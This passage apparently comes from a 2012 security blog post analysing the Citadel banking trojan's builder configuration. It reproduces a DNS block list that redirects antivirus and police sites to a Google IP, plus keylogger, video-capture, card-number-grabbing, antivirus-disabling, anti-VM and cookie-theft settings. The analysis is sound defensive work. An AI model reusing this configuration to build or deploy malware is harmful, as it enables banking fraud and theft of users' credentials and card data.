<span style="font-family: Arial; font-size: 10.0pt;">www.viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">acs.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.es=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tds.diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v4.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v5.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.model-fx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pccreg.antivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">k-otik.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">de.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">br.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.cai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securitoo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.esafe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.microworldsystems.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.ca.co=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.trendmicro-europe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">inline-software.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.proantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ikarus-software.at=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoft.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamhaus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.robtex.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.met.police.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.police.gov.hk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.interpol.int=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fsa.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.companies-house.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "CmdList"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "net view"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "tasklist"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "set"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "Keylogger"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> processes "calc___.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> time 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
<br />Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-22650527159836266882012-09-18T15:25:00.003-07:002012-09-18T15:25:58.029-07:00Config file troyan Citadel Builder 1.3.4.5<br />
<div class="MsoNormal">
<span style="font-family: Arial;">This document presents the
config file used for Citadel troyan, successor of famous Zeus banker Troyan
that is used to create the malicious binary that will infect users and will
communicate with the server that host the criminal infrastructure.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Among
all the new features of this new version underlines its modular configuration
depending on the modules that have been purchased on the black market.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">One
of these modules is the "CardSwipe" whose purpose is to capture all
confidential data from credit cards to operate with them fraudulently.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">In
this config file criminals have this option On.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> </span><span style="font-family: Arial;"> </span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">It
was possible to reproduce the inyection that makes the Troyan on the infected
machine and capture the screen that appears on user navigation asking to enter
all his confidential data from the credit card when is accessing to Internet
banking.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s1600/inject.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-QMS2kG7KC60/UFjYRmWhoLI/AAAAAAAAALI/jnBb41xvl8w/s400/inject.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Is
noted how troyan request secret PIN number (ATM Pin) and user identification
code of social Insurance (SSN), data that is never requested to the customer
under any circumstance.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Other
configuration parameters allow to capture video footage from the infected
computer<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">use_module_video
0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">entry
"Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> </span><span style="font-family: Arial;"> </span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">This
is very useful for criminals to capture the screen sequence in real time when
the user enters the secret codes of transfer authorization and bypass
authentication systems based on virtual keyboard.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Another
commands also let Citadel to capture data sent through the Chrome browser,
enable protection against virtual machines to prevent that binary malware could
be analyzed, disable sending of cookies and block access to antivirus companies
websites and malware protection websites. Redirecting usernavigation to Google
homepage ( </span><span style="background-color: white; color: #333333; font-family: Arial; font-size: 13px; line-height: 20.78333282470703px;">209.85.229.104) </span><span style="font-family: Arial;">everytime users try to access them. This doesn't change the hosts file
on the infected computer but do it by controlling the computer's DNS cache.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;">Even
also blocks access to webpages of law enforcement and police corps against
cybercrime.<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s1600/hosts-policia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-6Zm8lZ5gsPc/UFjYXrUEozI/AAAAAAAAALQ/zny2fW0rEfU/s320/hosts-policia.jpg" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"> </span><span style="font-family: Arial;">In
Next lines it will be showed the configuration of Citadel Builder 1.3.4.5</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<br />
<br />
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;">
<br /></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Default
config + updated AV's list (redirect to google.com)<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Citadel
Builder 1.3.4.5<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; SHORT
MANUAL BELOW ------------><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
url_config1 is required!!! url_config2 & url_config3 are optional, you can
setup it like a reserve config host.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
report_software - report to gate about installed firewall,antivirus,software: 1
is enabled<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off.
0 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it
on a GET parsing by LUHN10 algorithm.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it
on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
use_module_video 1/0 - Do you really want to use video grabber? If no, please
switch it off. 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP:// logs
grabber? 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
package_max_size 50 - logs reports transmission size(KB), stay it as default.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This
option takes exe link from "url_loader" section.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
antiemulation_enable 0/1 - if you enable it, you can't test it on virtual
machines such as VMWare/Virtualbox.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; disable_cookies
0/1 - if you setup 0, then cookies will send to your gate and .sol files will
be deleted. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; For
